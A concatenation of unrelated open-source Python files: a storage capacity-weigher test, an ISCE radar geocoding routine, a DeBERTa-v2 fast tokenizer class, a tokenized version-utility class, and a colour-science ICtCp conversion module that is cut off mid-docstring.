                         volume_utils.extract_host(worst_host.obj.host))

    def test_capacity_weight_cap_infinite(self):
        """A backend reporting infinite total capacity ranks worst."""
        self.flags(capacity_weight_multiplier=-1.0)
        self.host_manager.service_states['host5'] = {
            'total_capacity_gb': 'infinite',
            'free_capacity_gb': 3000,
            'allocated_capacity_gb': 1548,
            'provisioned_capacity_gb': 1548,
            'max_over_subscription_ratio': 1.0,
            'thin_provisioning_support': True,
            'thick_provisioning_support': False,
            'reserved_percentage': 5,
            'timestamp': datetime.utcnow()}
        backend_info_list = self._get_all_backends()

        # host1: thin_provisioning_support = False
        #        free_capacity_gb=1024,
        #        free=(1024-math.floor(1024*0.1))=-922
        #        Norm= -0.00829542413701
        # host2: thin_provisioning_support = True
        #        free_capacity_gb=300,
        #        free=(2048*1.5-1748-math.floor(2048*0.1))=-1120
        #        Norm=-0.00990099009901
        # host3: thin_provisioning_support = False
        #        free_capacity_gb=512, free=(256-512*0)=-256
        #        Norm=-0.002894884083
        # host4: thin_provisioning_support = True
        #        free_capacity_gb=200,
        #        free=(2048*1.0-2047-math.floor(2048*0.05))=101
        #        Norm=0.0
        # host5: free_capacity_gb=3000 free=infinite
        #        Norm=-1.0

        # so, host4 should win:
        weighed_hosts = self._get_weighed_hosts(backend_info_list)
        best_host = weighed_hosts[0]
        self.assertEqual(0.0, best_host.weight)
        self.assertEqual('host4',
                         volume_utils.extract_host(best_host.obj.host))
        # and host5 is the worst:
        worst_host = weighed_hosts[-1]
        self.assertEqual(-1.0, worst_host.weight)
        self.assertEqual('host5',
                         volume_utils.extract_host(worst_host.obj.host))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Authors: <NAME>, <NAME>
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Comment: Adapted from InsarProc/runGeocode.py
import logging
import os

import stdproc
from stdproc.rectify.geocode.Geocodable import Geocodable
import isceobj
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from iscesys.StdOEL.StdOELPy import create_writer

logger = logging.getLogger('isce.isceProc.runGeocode')

# Index passed to formSLC.getMocompPosition() to select the position record.
posIndx = 1


def runGeocode(self, prodlist, unwrapflag, bbox):
    """Generalized geocoding of all the files listed above (in prodlist).

    Geocodes every product in ``prodlist`` for each selected scene pair and
    polarization, recording inputs/outputs in the process catalog.

    :param prodlist: product file suffixes to geocode; a comma/space separated
        string is accepted and split into a list.
    :param unwrapflag: when false, the unwrapped interferogram is dropped from
        the product list.
    :param bbox: optional (south, north, west, east) geocoding bounding box;
        defaults to the topography SNWE extent.
    :raises ValueError: if ``bbox`` does not have exactly four elements.
    """
    if isinstance(prodlist, str):
        from isceobj.Util.StringUtils import StringUtils as SU
        tobeGeocoded = SU.listify(prodlist)
    else:
        tobeGeocoded = prodlist

    # Remove the unwrapped interferogram if no unwrapping is done.
    if not unwrapflag:
        try:
            tobeGeocoded.remove(self._isce.unwrappedIntFilename)
        except ValueError:
            # Not in the list: nothing to remove.
            pass

    print('Number of products to geocode: ', len(tobeGeocoded))
    # NOTE: the original code created an unused module-level stdWriter here
    # (never finalized, leaking a "geo.log" writer); run() creates its own
    # per-scene writer instead, so it has been removed.

    velocity, height = self._isce.vh()

    if bbox is not None:
        snwe = list(bbox)
        if len(snwe) != 4:
            # BUG FIX: was `raise valueError(...)` (lowercase), which itself
            # raised NameError instead of the intended ValueError.
            raise ValueError('Bounding box should be a list/tuple of length 4')
    else:
        snwe = self._isce.topo.snwe

    # Snapshot the per-run attributes needed by run() for each scene pair.
    infos = {}
    for attribute in ['demCropFilename', 'numberRangeLooks',
                      'numberAzimuthLooks', 'is_mocomp', 'demImage', 'peg',
                      'dopplerCentroid']:
        infos[attribute] = getattr(self._isce, attribute)

    for sceneid1, sceneid2 in self._isce.selectedPairs:
        pair = (sceneid1, sceneid2)
        for pol in self._isce.selectedPols:
            frame1 = self._isce.frames[sceneid1][pol]
            formSLC1 = self._isce.formSLCs[sceneid1][pol]
            sid = self._isce.formatname(pair, pol)
            infos['outputPath'] = os.path.join(
                self.getoutputdir(sceneid1, sceneid2), sid)
            catalog = isceobj.Catalog.createCatalog(self._isce.procDoc.name)
            run(tobeGeocoded, frame1, formSLC1, velocity, height, snwe,
                infos, catalog=catalog, sceneid=sid)
            self._isce.procDoc.addAllFromCatalog(catalog)


def run(tobeGeocoded, frame1, formSLC1, velocity, height, snwe, infos,
        catalog=None, sceneid='NO_ID'):
    """Geocode each product file for one scene/polarization.

    Existing product files under ``infos['outputPath']`` are geocoded one by
    one with a configured Geocode object; missing files are skipped with a
    log message.

    :raises RuntimeError: if no geocode method can be determined for a
        product file.
    """
    logger.info("Geocoding Image: %s", sceneid)
    stdWriter = create_writer("log", "", True,
                              filename=infos['outputPath'] + ".geo.log")
    planet = frame1.getInstrument().getPlatform().getPlanet()
    doppler = infos['dopplerCentroid'].getDopplerCoefficients(inHz=False)[0]

    # Geocode one by one.
    for prod in tobeGeocoded:
        prodPath = infos['outputPath'] + '.' + prod
        if not os.path.isfile(prodPath):
            # KK some prods are only in refScene folder! (tbd)
            logger.info("File not found. Skipping %s", prodPath)
            continue

        objGeo = stdproc.createGeocode(
            'insarapp_geocode_' + os.path.basename(prod).replace('.', ''))
        objGeo.configure()
        objGeo.referenceOrbit = formSLC1.getMocompPosition(posIndx)

        # IF statements to check for user configuration: only fill in values
        # the user has not already configured.
        if objGeo.minimumLatitude is None:
            objGeo.minimumLatitude = snwe[0]
        if objGeo.maximumLatitude is None:
            objGeo.maximumLatitude = snwe[1]
        if objGeo.minimumLongitude is None:
            objGeo.minimumLongitude = snwe[2]
        if objGeo.maximumLongitude is None:
            objGeo.maximumLongitude = snwe[3]
        if objGeo.demCropFilename is None:
            objGeo.demCropFilename = (
                infos['outputPath'] + '.' + infos['demCropFilename'])
        if objGeo.dopplerCentroidConstantTerm is None:
            objGeo.dopplerCentroidConstantTerm = doppler
        if objGeo.bodyFixedVelocity is None:
            objGeo.bodyFixedVelocity = velocity
        if objGeo.spacecraftHeight is None:
            objGeo.spacecraftHeight = height
        if objGeo.numberRangeLooks is None:
            objGeo.numberRangeLooks = infos['numberRangeLooks']
        if objGeo.numberAzimuthLooks is None:
            objGeo.numberAzimuthLooks = infos['numberAzimuthLooks']
        if objGeo.isMocomp is None:
            objGeo.isMocomp = infos['is_mocomp']

        objGeo.stdWriter = stdWriter

        # Create the instance of the image and return the method the geocoder
        # is supposed to use.
        ge = Geocodable()
        inImage, objGeo.method = ge.create(prodPath)
        if objGeo.method is None:
            # BUG FIX: the original fallback was `objGeo.method = method`,
            # where `method` is undefined in this scope -> guaranteed
            # NameError. Fail with an explicit, descriptive error instead.
            raise RuntimeError(
                'Could not determine geocode method for %s' % prodPath)

        if inImage:
            demImage = isceobj.createDemImage()
            IU.copyAttributes(infos['demImage'], demImage)

            objGeo(peg=infos['peg'], frame=frame1, planet=planet,
                   dem=demImage, tobegeocoded=inImage, geoPosting=None,
                   referenceslc=formSLC1)

            if catalog is not None:
                isceobj.Catalog.recordInputsAndOutputs(
                    catalog, objGeo,
                    "runGeocode.%s.%s" % (sceneid, prodPath),
                    logger,
                    "runGeocode.%s.%s" % (sceneid, prodPath))

    stdWriter.finalize()
# coding=utf-8
# Copyright 2020 Microsoft and the HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fast Tokenization class for model DeBERTa."""

import os
from shutil import copyfile
from typing import Optional, Tuple

from ...file_utils import is_sentencepiece_available
from ...tokenization_utils_fast import PreTrainedTokenizerFast
from ...utils import logging


# The slow tokenizer needs sentencepiece; expose it only when available so
# conversion from the fast tokenizer degrades gracefully.
if is_sentencepiece_available():
    from .tokenization_deberta_v2 import DebertaV2Tokenizer
else:
    DebertaV2Tokenizer = None

logger = logging.get_logger(__name__)

VOCAB_FILES_NAMES = {"vocab_file": "spm.model", "tokenizer_file": "tokenizer.json"}

PRETRAINED_VOCAB_FILES_MAP = {
    "vocab_file": {
        "microsoft/deberta-v2-xlarge": "https://huggingface.co/microsoft/deberta-v2-xlarge/resolve/main/spm.model",
        "microsoft/deberta-v2-xxlarge": "https://huggingface.co/microsoft/deberta-v2-xxlarge/resolve/main/spm.model",
        "microsoft/deberta-v2-xlarge-mnli": "https://huggingface.co/microsoft/deberta-v2-xlarge-mnli/resolve/main/spm.model",
        "microsoft/deberta-v2-xxlarge-mnli": "https://huggingface.co/microsoft/deberta-v2-xxlarge-mnli/resolve/main/spm.model",
    }
}

PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
    "microsoft/deberta-v2-xlarge": 512,
    "microsoft/deberta-v2-xxlarge": 512,
    "microsoft/deberta-v2-xlarge-mnli": 512,
    "microsoft/deberta-v2-xxlarge-mnli": 512,
}

PRETRAINED_INIT_CONFIGURATION = {
    "microsoft/deberta-v2-xlarge": {"do_lower_case": False},
    "microsoft/deberta-v2-xxlarge": {"do_lower_case": False},
    "microsoft/deberta-v2-xlarge-mnli": {"do_lower_case": False},
    "microsoft/deberta-v2-xxlarge-mnli": {"do_lower_case": False},
}


class DebertaV2TokenizerFast(PreTrainedTokenizerFast):
    r"""
    Constructs a DeBERTa-v2 fast tokenizer, backed by a
    [SentencePiece](https://github.com/google/sentencepiece) model.

    Args:
        vocab_file (`str`):
            [SentencePiece](https://github.com/google/sentencepiece) file (generally with a *.spm* extension)
            containing the vocabulary used to instantiate the tokenizer.
        do_lower_case (`bool`, *optional*, defaults to `False`):
            Whether or not to lowercase the input when tokenizing.
        split_by_punct (`bool`, *optional*, defaults to `False`):
            Whether or not to split tokens on punctuation.
        bos_token (`string`, *optional*, defaults to `"[CLS]"`):
            Beginning-of-sequence token used during pre-training (the actual sequence start token is `cls_token`).
        eos_token (`string`, *optional*, defaults to `"[SEP]"`):
            End-of-sequence token (the token actually used to end a built sequence is `sep_token`).
        unk_token (`str`, *optional*, defaults to `"[UNK]"`):
            Token substituted for anything not in the vocabulary.
        sep_token (`str`, *optional*, defaults to `"[SEP]"`):
            Separator token, used between sequence pairs and as the final special token of a built sequence.
        pad_token (`str`, *optional*, defaults to `"[PAD]"`):
            Padding token used when batching sequences of different lengths.
        cls_token (`str`, *optional*, defaults to `"[CLS]"`):
            Classifier token; the first token of every built sequence.
        mask_token (`str`, *optional*, defaults to `"[MASK]"`):
            Token used for masked-language-model training targets.
        sp_model_kwargs (`dict`, *optional*):
            Extra keyword arguments forwarded to `SentencePieceProcessor.__init__()` (e.g. `enable_sampling`,
            `nbest_size`, `alpha` for subword regularization / BPE-dropout).
    """

    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
    slow_tokenizer_class = DebertaV2Tokenizer

    def __init__(
        self,
        vocab_file=None,
        tokenizer_file=None,
        do_lower_case=False,
        split_by_punct=False,
        bos_token="[CLS]",
        eos_token="[SEP]",
        unk_token="[UNK]",
        sep_token="[SEP]",
        pad_token="[PAD]",
        cls_token="[CLS]",
        mask_token="[MASK]",
        **kwargs
    ) -> None:
        super().__init__(
            vocab_file,
            tokenizer_file=tokenizer_file,
            do_lower_case=do_lower_case,
            bos_token=bos_token,
            eos_token=eos_token,
            unk_token=unk_token,
            sep_token=sep_token,
            pad_token=pad_token,
            cls_token=cls_token,
            mask_token=mask_token,
            split_by_punct=split_by_punct,
            **kwargs,
        )

        self.do_lower_case = do_lower_case
        self.split_by_punct = split_by_punct
        self.vocab_file = vocab_file
        # Converting back to a slow tokenizer requires the original spm file.
        self.can_save_slow_tokenizer = bool(self.vocab_file)

    def build_inputs_with_special_tokens(self, token_ids_0, token_ids_1=None):
        """
        Build model inputs for single sequences or sequence pairs by adding the
        DeBERTa special tokens:

        - single sequence: [CLS] X [SEP]
        - pair of sequences: [CLS] A [SEP] B [SEP]

        Args:
            token_ids_0 (`List[int]`): IDs of the first sequence.
            token_ids_1 (`List[int]`, *optional*): IDs of the second sequence, if any.

        Returns:
            `List[int]`: Input IDs with special tokens inserted.
        """
        output = [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
        if token_ids_1 is not None:
            output = output + token_ids_1 + [self.sep_token_id]
        return output

    def get_special_tokens_mask(self, token_ids_0, token_ids_1=None, already_has_special_tokens=False):
        """
        Produce a mask marking special tokens (1) versus sequence tokens (0)
        for a sequence that has not yet had special tokens added. Used by
        `prepare_for_model` / `encode_plus`.

        Args:
            token_ids_0 (`List[int]`): IDs of the first sequence.
            token_ids_1 (`List[int]`, *optional*): IDs of the second sequence, if any.
            already_has_special_tokens (`bool`, *optional*, defaults to `False`):
                Set when the input already contains special tokens.

        Returns:
            `List[int]`: A list of 0/1 flags, 1 for special tokens.
        """
        if already_has_special_tokens:
            return super().get_special_tokens_mask(
                token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
            )

        mask = [1] + [0] * len(token_ids_0) + [1]
        if token_ids_1 is not None:
            mask = mask + [0] * len(token_ids_1) + [1]
        return mask

    def create_token_type_ids_from_sequences(self, token_ids_0, token_ids_1=None):
        """
        Build token type IDs for a sequence pair. DeBERTa uses:

        ```
        0 0 0 0 0 0 0 0 0 0 0 1 1 1 1 1 1 1 1 1
        | first sequence    | second sequence |
        ```

        With no second sequence, only the 0s portion is returned.

        Args:
            token_ids_0 (`List[int]`): IDs of the first sequence.
            token_ids_1 (`List[int]`, *optional*): IDs of the second sequence, if any.

        Returns:
            `List[int]`: Token type IDs for the combined sequence.
        """
        first_segment = [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
        if token_ids_1 is None:
            return [0] * len(first_segment)
        return [0] * len(first_segment) + [1] * len(token_ids_1 + [self.sep_token_id])

    def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
        """Copy the SentencePiece model into `save_directory` and return its path."""
        if not self.can_save_slow_tokenizer:
            raise ValueError(
                "Your fast tokenizer does not have the necessary information to save the vocabulary for a slow "
                "tokenizer."
            )

        if not os.path.isdir(save_directory):
            logger.error(f"Vocabulary path ({save_directory}) should be a directory")
            return

        prefix = filename_prefix + "-" if filename_prefix else ""
        out_vocab_file = os.path.join(save_directory, prefix + VOCAB_FILES_NAMES["vocab_file"])

        # Avoid copying the file onto itself.
        if os.path.abspath(self.vocab_file) != os.path.abspath(out_vocab_file):
            copyfile(self.vocab_file, out_vocab_file)

        return (out_vocab_file,)
"""Version utilities."""<import_from_future_stmt> annotations<import_stmt>packaging.version<class_stmt>Version(packaging.version.Version)<block_start>"""Customize packagining.version.Version."""<def_stmt>__init__ self version:str<arrow><none><block_start>"""Instantiate class. Args: version: Version string. (e.g. 1.0.0, v1.0.0) """<line_sep>self._original_text=version<line_sep>super().__init__(version)<block_end><def_stmt>__repr__ self<arrow>str<block_start>"""Return repr."""<line_sep># this usage of super is required to reproduce the intended result in # any subclasses of this class # pylint: disable=super-with-arguments <return>f"<Version('{super(Version self).__str__()}')>"<block_end><def_stmt>__str__ self<arrow>str<block_start>"""Return the original version string."""<line_sep><return>self._original_text<block_end><block_end>
# -*- coding: utf-8 -*-
"""
:math:`IC_TC_P` Colour Encoding
===============================

Defines the :math:`IC_TC_P` colour encoding related transformations:

-   :func:`colour.RGB_to_ICtCp`
-   :func:`colour.ICtCp_to_RGB`
-   :func:`colour.XYZ_to_ICtCp`
-   :func:`colour.ICtCp_to_XYZ`

References
----------
-   :cite:`Dolby2016a` : Dolby. (2016). WHAT IS ICtCp? - INTRODUCTION.
    https://www.dolby.com/us/en/technologies/dolby-vision/\
ICtCp-white-paper.pdf
-   :cite:`InternationalTelecommunicationUnion2018` : International
    Telecommunication Union. (2018). Recommendation ITU-R BT.2100-2 - Image
    parameter values for high dynamic range television for use in production
    and international programme exchange.
    https://www.itu.int/dms_pubrec/itu-r/rec/bt/\
R-REC-BT.2100-2-201807-I!!PDF-E.pdf
-   :cite:`Lu2016c` : Lu, T. et al. (2016). ITP Colour Space and Its
    Compression Performance for High Dynamic Range and Wide Colour Gamut
    Video Distribution. ZTE Communications, 14(1), 32-38.
"""

import numpy as np

from colour.algebra import vector_dot
from colour.colorimetry import CCS_ILLUMINANTS
from colour.models.rgb import RGB_COLOURSPACES, RGB_to_XYZ, XYZ_to_RGB
from colour.models.rgb.transfer_functions import (
    eotf_ST2084, eotf_inverse_ST2084, oetf_HLG_BT2100,
    oetf_inverse_HLG_BT2100)
from colour.utilities import (domain_range_scale, from_range_1, to_domain_1,
                              validate_method)

__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'

__all__ = [
    'MATRIX_ICTCP_RGB_TO_LMS', 'MATRIX_ICTCP_LMS_TO_RGB',
    'MATRIX_ICTCP_LMS_P_TO_ICTCP', 'MATRIX_ICTCP_ICTCP_TO_LMS_P',
    'MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2',
    'MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2', 'RGB_to_ICtCp',
    'ICtCp_to_RGB', 'XYZ_to_ICtCp', 'ICtCp_to_XYZ'
]

MATRIX_ICTCP_RGB_TO_LMS = np.array([
    [1688, 2146, 262],
    [683, 2951, 462],
    [99, 309, 3688],
]) / 4096
"""
*ITU-R BT.2020* colourspace to normalised cone responses matrix.

MATRIX_ICTCP_RGB_TO_LMS : array_like, (3, 3)
"""

MATRIX_ICTCP_LMS_TO_RGB = np.linalg.inv(MATRIX_ICTCP_RGB_TO_LMS)
"""
:math:`IC_TC_P` colourspace normalised cone responses to *ITU-R BT.2020*
colourspace matrix.

MATRIX_ICTCP_LMS_TO_RGB : array_like, (3, 3)
"""

MATRIX_ICTCP_LMS_P_TO_ICTCP = np.array([
    [2048, 2048, 0],
    [6610, -13613, 7003],
    [17933, -17390, -543],
]) / 4096
"""
:math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to
:math:`IC_TC_P` colour encoding matrix.

MATRIX_ICTCP_LMS_P_TO_ICTCP : array_like, (3, 3)
"""

MATRIX_ICTCP_ICTCP_TO_LMS_P = np.linalg.inv(MATRIX_ICTCP_LMS_P_TO_ICTCP)
"""
:math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded
normalised cone responses matrix.

MATRIX_ICTCP_ICTCP_TO_LMS_P : array_like, (3, 3)
"""

MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 = np.array([
    [2048, 2048, 0],
    [3625, -7465, 3840],
    [9500, -9212, -288],
]) / 4096
"""
:math:`LMS_p` *SMPTE ST 2084:2014* encoded normalised cone responses to
:math:`IC_TC_P` colour encoding matrix as given in *ITU-R BT.2100-2*.

MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2 : array_like, (3, 3)
"""

MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 = np.linalg.inv(
    MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2)
"""
:math:`IC_TC_P` colour encoding to :math:`LMS_p` *SMPTE ST 2084:2014* encoded
normalised cone responses matrix as given in *ITU-R BT.2100-2*.

MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2 : array_like, (3, 3)
"""

# Valid values for the "method" parameter, shared by all the definitions
# below so that the list is maintained in a single place.
_ICTCP_METHODS = [
    'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
    'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'
]


def RGB_to_ICtCp(RGB, method='Dolby 2016', L_p=10000):
    """
    Converts from *ITU-R BT.2020* colourspace to :math:`IC_TC_P` colour
    encoding.

    Parameters
    ----------
    RGB : array_like
        *ITU-R BT.2020* colourspace array.
    method : unicode, optional
        **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
        'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
        Computation method. *Recommendation ITU-R BT.2100* defines multiple
        variants of the :math:`IC_TC_P` colour encoding:

        -   *ITU-R BT.2100-1*

            -   *SMPTE ST 2084:2014* inverse electro-optical transfer
                function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
                :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
                *ITU-R BT.2100-2 PQ* methods.
            -   *Recommendation ITU-R BT.2100* *Reference HLG*
                opto-electrical transfer function (OETF / OECF) and the
                :math:`IC_TC_P` matrix from :cite:`Dolby2016a`:
                *ITU-R BT.2100-1 HLG* method.

        -   *ITU-R BT.2100-2*

            -   *SMPTE ST 2084:2014* inverse electro-optical transfer
                function (EOTF / EOCF) and the :math:`IC_TC_P` matrix from
                :cite:`Dolby2016a`: *Dolby 2016*, *ITU-R BT.2100-1 PQ*,
                *ITU-R BT.2100-2 PQ* methods.
            -   *Recommendation ITU-R BT.2100* *Reference HLG*
                opto-electrical transfer function (OETF / OECF) and a custom
                :math:`IC_TC_P` matrix from
                :cite:`InternationalTelecommunicationUnion2018`:
                *ITU-R BT.2100-2 HLG* method.

    L_p : numeric, optional
        Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
        non-linear encoding. This parameter should stay at its default
        :math:`10000 cd/m^2` value for practical applications. It is exposed
        so that the definition can be used as a fitting function.

    Returns
    -------
    ndarray
        :math:`IC_TC_P` colour encoding array.

    Warnings
    --------
    The underlying *SMPTE ST 2084:2014* transfer function is an absolute
    transfer function.

    Notes
    -----
    -   The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are
        aliases for the *Dolby 2016* method.
    -   The underlying *SMPTE ST 2084:2014* transfer function is an absolute
        transfer function, thus the domain and range values for the
        *Reference* and *1* scales are only indicative that the data is not
        affected by scale transformations. The effective domain of *SMPTE ST
        2084:2014* inverse electro-optical transfer function (EOTF / EOCF)
        is [0.0001, 10000].

    +------------+-----------------------+------------------+
    | **Domain** | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``RGB``    | ``UN``                | ``UN``           |
    +------------+-----------------------+------------------+

    +------------+-----------------------+------------------+
    | **Range**  | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``ICtCp``  | ``I``  : [0, 1]       | ``I``  : [0, 1]  |
    |            |                       |                  |
    |            | ``CT`` : [-1, 1]      | ``CT`` : [-1, 1] |
    |            |                       |                  |
    |            | ``CP`` : [-1, 1]      | ``CP`` : [-1, 1] |
    +------------+-----------------------+------------------+

    References
    ----------
    :cite:`Dolby2016a`, :cite:`Lu2016c`

    Examples
    --------
    >>> RGB = np.array([0.45620519, 0.03081071, 0.04091952])
    >>> RGB_to_ICtCp(RGB)  # doctest: +ELLIPSIS
    array([ 0.0735136...,  0.0047525...,  0.0935159...])
    >>> RGB_to_ICtCp(RGB, method='ITU-R BT.2100-2 HLG')  # doctest: +ELLIPSIS
    array([ 0.6256789..., -0.0198449...,  0.3591125...])
    """

    RGB = to_domain_1(RGB)
    method = validate_method(method, _ICTCP_METHODS)

    is_hlg_method = 'hlg' in method
    is_BT2100_2_method = '2100-2' in method

    # Linear *ITU-R BT.2020* RGB to (linear) cone responses.
    LMS = vector_dot(MATRIX_ICTCP_RGB_TO_LMS, RGB)

    # Non-linear encoding of the cone responses: *Reference HLG* OETF or
    # *SMPTE ST 2084:2014* (PQ) inverse EOTF depending on the method.
    with domain_range_scale('ignore'):
        LMS_p = (oetf_HLG_BT2100(LMS)
                 if is_hlg_method else eotf_inverse_ST2084(LMS, L_p))

    # Only the *ITU-R BT.2100-2 HLG* variant uses its own custom matrix.
    ICtCp = (vector_dot(MATRIX_ICTCP_LMS_P_TO_ICTCP_HLG_BT2100_2, LMS_p)
             if (is_hlg_method and is_BT2100_2_method) else
             vector_dot(MATRIX_ICTCP_LMS_P_TO_ICTCP, LMS_p))

    return from_range_1(ICtCp)


def ICtCp_to_RGB(ICtCp, method='Dolby 2016', L_p=10000):
    """
    Converts from :math:`IC_TC_P` colour encoding to *ITU-R BT.2020*
    colourspace.

    Parameters
    ----------
    ICtCp : array_like
        :math:`IC_TC_P` colour encoding array.
    method : unicode, optional
        **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
        'ITU-R BT.2100-2 HLG', 'ITU-R BT.2100-2 PQ'}**,
        Computation method. See the :func:`RGB_to_ICtCp` definition for the
        description of the *Recommendation ITU-R BT.2100* variants.
    L_p : numeric, optional
        Display peak luminance :math:`cd/m^2` for *SMPTE ST 2084:2014*
        non-linear encoding. This parameter should stay at its default
        :math:`10000 cd/m^2` value for practical applications. It is exposed
        so that the definition can be used as a fitting function.

    Returns
    -------
    ndarray
        *ITU-R BT.2020* colourspace array.

    Warnings
    --------
    The underlying *SMPTE ST 2084:2014* transfer function is an absolute
    transfer function.

    Notes
    -----
    -   The *ITU-R BT.2100-1 PQ* and *ITU-R BT.2100-2 PQ* methods are
        aliases for the *Dolby 2016* method.
    -   The underlying *SMPTE ST 2084:2014* transfer function is an absolute
        transfer function, thus the domain and range values for the
        *Reference* and *1* scales are only indicative that the data is not
        affected by scale transformations.

    +------------+-----------------------+------------------+
    | **Domain** | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``ICtCp``  | ``I``  : [0, 1]       | ``I``  : [0, 1]  |
    |            |                       |                  |
    |            | ``CT`` : [-1, 1]      | ``CT`` : [-1, 1] |
    |            |                       |                  |
    |            | ``CP`` : [-1, 1]      | ``CP`` : [-1, 1] |
    +------------+-----------------------+------------------+

    +------------+-----------------------+------------------+
    | **Range**  | **Scale - Reference** | **Scale - 1**    |
    +============+=======================+==================+
    | ``RGB``    | ``UN``                | ``UN``           |
    +------------+-----------------------+------------------+

    References
    ----------
    :cite:`Dolby2016a`, :cite:`Lu2016c`

    Examples
    --------
    >>> ICtCp = np.array([0.07351364, 0.00475253, 0.09351596])
    >>> ICtCp_to_RGB(ICtCp)  # doctest: +ELLIPSIS
    array([ 0.4562052...,  0.0308107...,  0.0409195...])
    >>> ICtCp = np.array([0.62567899, -0.01984490, 0.35911259])
    >>> ICtCp_to_RGB(ICtCp, method='ITU-R BT.2100-2 HLG')
    ... # doctest: +ELLIPSIS
    array([ 0.4562052...,  0.0308107...,  0.0409195...])
    """

    ICtCp = to_domain_1(ICtCp)
    method = validate_method(method, _ICTCP_METHODS)

    is_hlg_method = 'hlg' in method
    is_BT2100_2_method = '2100-2' in method

    # Inverse of RGB_to_ICtCp: ICtCp back to the encoded cone responses,
    # using the custom matrix for the *ITU-R BT.2100-2 HLG* variant only.
    LMS_p = (vector_dot(MATRIX_ICTCP_ICTCP_TO_LMS_P_HLG_BT2100_2, ICtCp)
             if (is_hlg_method and is_BT2100_2_method) else
             vector_dot(MATRIX_ICTCP_ICTCP_TO_LMS_P, ICtCp))

    # Decode the cone responses: *Reference HLG* inverse OETF or
    # *SMPTE ST 2084:2014* (PQ) EOTF depending on the method.
    with domain_range_scale('ignore'):
        LMS = (oetf_inverse_HLG_BT2100(LMS_p)
               if is_hlg_method else eotf_ST2084(LMS_p, L_p))

    RGB = vector_dot(MATRIX_ICTCP_LMS_TO_RGB, LMS)

    return from_range_1(RGB)


def XYZ_to_ICtCp(XYZ,
                 illuminant=CCS_ILLUMINANTS[
                     'CIE 1931 2 Degree Standard Observer']['D65'],
                 chromatic_adaptation_transform='CAT02',
                 method='Dolby 2016',
                 L_p=10000):
    """
    Converts from *CIE XYZ* tristimulus values to :math:`IC_TC_P` colour
    encoding.

    Parameters
    ----------
    XYZ : array_like
        *CIE XYZ* tristimulus values.
    illuminant : array_like, optional
        Source illuminant chromaticity coordinates.
    chromatic_adaptation_transform : unicode, optional
        **{'CAT02', 'XYZ Scaling', 'Von Kries', 'Bradford', 'Sharp',
        'Fairchild', 'CMCCAT97', 'CMCCAT2000', 'CAT02 Brill 2008', 'CAT16',
        'Bianco 2010', 'Bianco PC 2010'}**,
        *Chromatic adaptation* transform.
    method : unicode, optional
        **{'Dolby 2016', 'ITU-R BT.2100-1 HLG', 'ITU-R BT.2100-1 PQ',
